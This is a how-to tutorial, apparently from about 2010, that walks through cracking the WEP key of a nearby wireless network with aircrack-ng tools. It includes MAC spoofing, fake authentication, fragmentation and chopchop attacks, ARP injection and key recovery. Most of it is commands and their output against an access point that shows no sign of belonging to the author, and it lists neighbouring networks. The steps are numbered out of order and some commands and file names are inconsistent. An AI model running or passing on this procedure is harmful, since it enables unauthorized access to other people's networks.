1 - Set the wireless card MAC address

2 - Start the wireless interface in monitor mode

3 - Scan for WEP access points
4 - Pick out which WEP AP you want to attack, and associate airodump to that channel/bssid.
5 - Use aireplay-ng chopchop or fragmentation attack to obtain PRGA
6 - Use packetforge-ng to create a ARP packet
7 - Step Inject the ARP packetfrom step #6
Final Step Crack the WEP key

Step 1: Set up the wireless card MAC Address

This isn't really necessary however the command to do so is machange -r mon0
Keep in mind this applies to the card that I have, your interface may be different.
-r (random). By using this flag the mac address generated will be random.
root@bt:~# macchanger -r wlan0
Current MAC: 00:c0:ca:33:7f:72 (Alfa, Inc.)
Faked MAC: 36:b1:e6:05:32:da (unknown)
Step 2: Start the wireless interface in monitor mode
airmong-ng start wlan0
note once again wlan0 is my interface. Feel free to check for yours with the iwconfig command.
You should see the following
root@bt:~# airmon-ng start wlan0
Interface

Chipset

wlan0

RTL8187
rtl8187 - [phy0]
(monitor mode enabled on mon1)
RTL8187
rtl8187 - [phy0]

mon0

Driver

If you see the monitor mode enabled you know your then good to go.

Step 3. Scan for WEP access points

airodump-ng mon0
You should see something like this.

CH 7 ][ Elapsed: 16 s ][ 2010-09-01 00:39

BSSID

PWR Beacons

00:24:A5:AD:79:59 -13
00:1C:10:A1:C1:32 -61
00:1B:5B:B3:B5:71 -63
00:18:39:B1:4D:DD -64
00:19:E4:48:97:A9 -63
00:18:39:62:34:EE -63
00:25:3C:F1:C9:E9 -66
00:1A:70:00:77:E4 -64
00:18:3F:2B:A2:01 -67
00:26:50:D0:4D:C9 -69
00:0F:66:D2:6E:F4 -70
00:1D:7E:97:C0:1D -71
00:1E:E5:EB:63:6C -69
00:23:51:3B:89:D1 -71
00:24:B2:51:C6:CA -71

26
3
4
14
11
19
5
13
7
2
5
4
5
3
3

#Data, #/s CH MB ENC CIPHER AUTH ESSID

0
0
2
0
0
0
0
0
0
0
0
0
0
0
0

0 6 54e. WPA2 CCMP PSK PwnSauce

0 11 54 WEP WEP
dusty
0 8 54 . WEP WEP
2WIRE486
0 1 54 WPA2 CCMP PSK rocky4191980net
0 1 54 . WEP WEP
2WIRE040
0 6 54 OPN
linksys
0 11 54 . WEP WEP
2WIRE266
0 6 54 OPN
Moyers
0 1 54 . WEP WEP
2WIRE305
0 6 54 . WEP WEP
2WIRE705
0 6 54 . WPA TKIP PSK HFNET
0 1 54e WPA2 CCMP PSK RRlinksys
0 6 54e. WPA2 CCMP PSK jake wireless
0 3 54 . WEP WEP
2WIRE629
0 1 54e. WPA2 CCMP PSK Pepp-Main-Office2.4Ghz

Step 4. Pick out which WEP AP you want to attack, and

associate airodump to that channel/bssid. In this case I have
decided on 2WIRE040.
Airodump-ng -c 1 bssid 00:19:E4:48:97:A9 -w wepcrack mon0
Step 6. Use aireplay-ng to do a fake authentication with the WAP.
Aireplay-ng -1 0 -e 2WIRE040 -a 00:19:E4:48:97:A9 -h 36:b1:e6:05:32:da mon0
-1 mean fake authentication attack
0 is how often it will time out in seconds
-e is the ssid name in this case 2WIRE040
-a is the Access Points MAC
-h is your mac address in this case 36:b1:e6:05:32:da
-w is the file name in this case wepcrack
mon0 is the wireless interface name
you should see something similar to this.
00:47:56 Waiting for beacon frame (BSSID: 00:19:E4:48:97:A9) on channel 1
00:47:56 Sending Authentication Request (Open System) [ACK]
00:47:56 Authentication successful
00:47:56 Sending Association Request [ACK]

00:48:01
00:48:01
00:48:01
00:48:01

Sending Authentication Request (Open System) [ACK]

Authentication successful
Sending Association Request [ACK]
Association successful :-) (AID: 1)

Step 5. Use aireplay-ng chopchop or fragmentation attack to obtain PRGA

Let's use the fragmentation attack first.
Aireplay -5 -b 00:19:E4:48:97:A9 -h 36:b1:e6:05:32:da mon0
-5 is the fragmentation attack
-b is the WAP MAC address in this case 00:19:E4:48:97:A9
-h is your MAC address in this case 36:b1:e6:05:32:da
you should see this
00:51:26 Waiting for beacon frame (BSSID: 00:19:E4:48:97:A9) on channel 1
00:51:26 Waiting for a data packet...
Read 114 packets...
Size: 68, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:19:E4:48:97:A9
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:19:E4:48:97:A9
0x0000:
0x0010:
0x0020:
0x0030:
0x0040:

0842 0000 ffff ffff ffff 0019 e448 97a9 .B...........H..

0019 e448 97a9 2055 df6b 2c00 2d25 81d7 ...H.. U.k,.-%..
c27e 6181 7323 1df2 b8ba 990f 2470 b5c5 .~a.s#......$p..
e377 3200 045a 849c 835f a199 3763 6ad6 .w2..Z..._..7cj.
c366 64cc
.fd.

Use this packet ? Y

Saving chosen packet in replay_src-0901-005130.cap
00:51:40 Data packet found!
00:51:40 Sending fragmented packet
00:51:40 Not enough acks, repeating...
00:51:40 Sending fragmented packet
00:51:42 No answer, repeating...
00:51:42 Trying a LLC NULL packet
00:51:42 Sending fragmented packet
00:51:42 Got RELAYED packet!!
00:51:42 Trying to get 384 bytes of a keystream
00:51:42 Got RELAYED packet!!
00:51:42 Trying to get 1500 bytes of a keystream
00:51:42 Got RELAYED packet!!
Saving keystream in fragment-0901-005142.xor

Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
Was the previous step failboat? If so you might want to use a chopchop attack seen below
aireplay-ng -4 -h 36:b1:e6:05:32 -b 00:19:E4:48:97:A9 mon0
-4 mean the chopchop attack
-h is our hosts mac address in this case 36:b1:e6:05:32
-b is our WAP mac address in this case 00:19:E4:48:97:A9
mon0 is the wireless interface
You should see something similar
.
01:54:33 Waiting for beacon frame (BSSID: 00:19:E4:48:97:A9) on channel 1
Size: 68, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:19:E4:48:97:A9
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:19:E4:48:97:A9
0x0000:
0x0010:
0x0020:
0x0030:
0x0040:

0842 0000 ffff ffff ffff 0019 e448 97a9 .B...........H..

0019 e448 97a9 0094 e74d 9c00 37d2 4c5b ...H.....M..7.L[
3410 24dd 7b04 bdc5 fc13 ada3 339d a06f 4.$.{.......3..o
d1e2 0825 ecc8 539e c1c5 321f 55c3 58f1 ...%..S...2.U.X.
1ca8 e016
....

Use this packet ? y

Saving chosen packet in replay_src-0901-015434.cap
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset

67 ( 0% done) | xor = 08 | pt = 1E | 168 frames written in 2862ms

66 ( 2% done) | xor = 61 | pt = 81 | 426 frames written in 7247ms
65 ( 5% done) | xor = 2C | pt = 84 | 32 frames written in 536ms
64 ( 8% done) | xor = 0A | pt = 16 | 684 frames written in 11637ms
63 (11% done) | xor = 9A | pt = 6B | 326 frames written in 5539ms
62 (14% done) | xor = 59 | pt = 01 | 182 frames written in 3100ms
61 (17% done) | xor = 6B | pt = A8 | 39 frames written in 664ms
60 (20% done) | xor = 95 | pt = C0 | 654 frames written in 11111ms
59 (23% done) | xor = E0 | pt = FF | 14 frames written in 230ms
58 (26% done) | xor = CD | pt = FF | 753 frames written in 12813ms
57 (29% done) | xor = 3A | pt = FF | 669 frames written in 11369ms
56 (32% done) | xor = 3E | pt = FF | 19 frames written in 320ms
55 (35% done) | xor = 61 | pt = FF | 276 frames written in 4701ms
54 (38% done) | xor = AC | pt = FF | 1960 frames written in 33312ms
53 (41% done) | xor = 36 | pt = FE | 1100 frames written in 18705ms
52 (44% done) | xor = ED | pt = 01 | 91 frames written in 1546ms

Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset
Offset

51 (47% done) | xor = 8D | pt = A8 | 144 frames written in 2443ms

50 (50% done) | xor = C8 | pt = C0 | 42 frames written in 714ms
49 (52% done) | xor = 4B | pt = A9 | 173 frames written in 2941ms
48 (55% done) | xor = 46 | pt = 97 | 2360 frames written in 40130ms
47 (58% done) | xor = 27 | pt = 48 | 320 frames written in 5435ms
46 (61% done) | xor = 44 | pt = E4 | 1281 frames written in 21766ms
45 (64% done) | xor = 84 | pt = 19 | 1650 frames written in 28064ms
44 (67% done) | xor = 33 | pt = 00 | 241 frames written in 4091ms
43 (70% done) | xor = A2 | pt = 01 | 193 frames written in 3289ms
42 (73% done) | xor = AD | pt = 00 | 613 frames written in 10407ms
41 (76% done) | xor = 17 | pt = 04 | 163 frames written in 2776ms
40 (79% done) | xor = FA | pt = 06 | 1353 frames written in 23009ms
39 (82% done) | xor = C5 | pt = 00 | 136 frames written in 2305ms
38 (85% done) | xor = B5 | pt = 08 | 2027 frames written in 34467ms
37 (88% done) | xor = 05 | pt = 01 | 488 frames written in 8295ms
36 (91% done) | xor = 7B | pt = 00 | 18 frames written in 303ms
35 (94% done) | xor = DB | pt = 06 | 229 frames written in 3890ms
34 (97% done) | xor = 2C | pt = 08 | 404 frames written in 6871ms

Saving plaintext in replay_dec-0901-015714.cap

Saving keystream in replay_dec-0901-015714.xor
Completed in 152s (0.20 bytes/s)
Success ^ :)

Step 6. Use packetforge-ng to create a ARP packet

packetforge-ng -0 -a 00:19:E4:48:97:A9 -h 36:b1:e6:05:32:da -k 255.255.255.255 -l 255.255.255.255
-y fragment-0901-005142.xor -w wepcrack
-0 means create a ARP packet
-a is the WAP MAC in this case 00:19:E4:48:97:A9
-h is your MAC address in this case 36:b1:e6:05:32:da
-k is the destination IP (most AP's will work find with this setting)
-l is the source ip (again most AP's will respond fine with this)
-y fragment-0901-006142.xor is the file you get your PRGA from
-w is the name of the file you wish to call it in this case wepcrack
Success will look like this
Wrote packet to: wepcrack

Step 7. Inject the ARP packet

aireplay-ng -2 -r wepcrack mon0

-2 means interative mode

-r is the file of which to read the arp packet in this case wepcrack
you should see something similar
No source MAC (-h) specified. Using the device MAC (00:C0:CA:33:7F:72)
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:19:E4:48:97:A9
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:C0:CA:33:7F:72
0x0000:
0x0010:
0x0020:
0x0030:
0x0040:

0841 0201 0019 e448 97a9 00c0 ca33 7f72 .A.....H.....3r

ffff ffff ffff 8001 df6e f700 79d3 cc92 .........n..y...
f911 0d44 a461 c287 e878 caf7 61ea edbc ...D.a...x..a...
a2cc 2b96 c8fa 1097 cb73 75ac cfd6 f8c6 ..+......su.....
eea8 f908
....

Use this packet ? y

Now we wait for about 40,000 IV's. If you take a look at your airodump window you will see the data
start to sky rocket. When this reaches 40,000 hit ctrl+C to kill the process.
Succes :)
CH 1 ][ Elapsed: 27 mins ][ 2010-09-01 01:19
BSSID

PWR RXQ Beacons

00:19:E4:48:97:A9 -67 33

8396

#Data, #/s CH MB ENC CIPHER AUTH ESSID

43869 41 1 54 . WEP WEP

2WIRE040

Final Step: Crack the WEP key

aircrack-ng -b 00:19:E4:48:97:A9 crackwep*.cap
-b is the WAP MAC address in this case 00:19:E4:48:97:A9
After a few seconds you will get the key
Aircrack-ng 1.0 r1645
[00:00:00] Tested 74 keys (got 43384 IVs)

KB depth byte(vote)
0 0/ 2 82(57088) CE(52224) 09(51968) F1(51712) 8A(51200) 3E(50944) 52(50432) 4E(50176)
4F(50176) 93(50176) 35(49920) EE(49920) 13(48896) 14(48896)
1 1/ 3 90(52736) F9(52224) 2E(51200) D5(50944) BA(50688) B9(50432) 51(49920) C1(49920)
48(49664) 35(49408) 12(49152) 9B(49152) F4(48896) 9D(48640)
2 0/ 1 73(60416) 49(54016) 79(52480) 11(52224) 22(52224) 7B(51712) EF(50944) 16(50432)
58(50432) 82(50432) D4(50432) 72(49664) 3A(49408) BA(49152)
3 0/ 6 08(56320) A8(54784) 1C(52992) B3(52736) 10(52224) 8D(51968) D8(50944) 82(50688)
10(50176) 0E(49920) CB(49920) F7(49408) 5F(49152) DA(49152)
4 0/ 3 80(55808) 00(52480) 0B(51456) FC(50944) 95(50432) B7(50432) AE(49920) C0(49408)
E4(49152) 24(48896) 6D(48896) 82(48896) 7F(48640) D4(48640)
KEY FOUND! [ 82:77:73:08:80 ]
Decrypted correctly: 100%
I hope you enjoyed my tutorial.
Securityxxxpert
Note I will be making a video as well to attach with when time permits.